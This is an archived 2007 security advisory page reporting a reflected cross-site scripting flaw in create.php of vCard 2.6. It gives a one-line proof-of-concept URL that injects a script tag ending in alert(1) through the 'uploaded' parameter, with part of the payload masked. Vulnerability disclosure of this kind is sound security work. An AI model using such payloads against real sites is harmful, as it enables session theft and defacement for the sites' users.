Computer Security

Security Advisory: XSS Remote In vCard 2.6 (c)2002
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Wordpress <= v2.1.0

  Arbitrary file disclosure vulnerability in rrdbrowse <= 1.6

  LI-Guestbook SQL Injection Vulnerability

  Sava's GuestBook Multiple Vulnerabilities

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:05.03.2007
Subject:XSS Remote In vCard 2.6 (c)2002

Discovered By : Hasadya Raed
Contact : RaeD@BsdMail.Com
Script: vCard 2.6 (c)2002  

******************************************************************************  
Bug in : create.php  

********************************************************************************  
Exploit :
http://www.victim.com/path/create.php?uploaded=">**********alert(1)
;</script>  
********************************************************************************  


--
_______________________________________________
Get your free email from http://bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru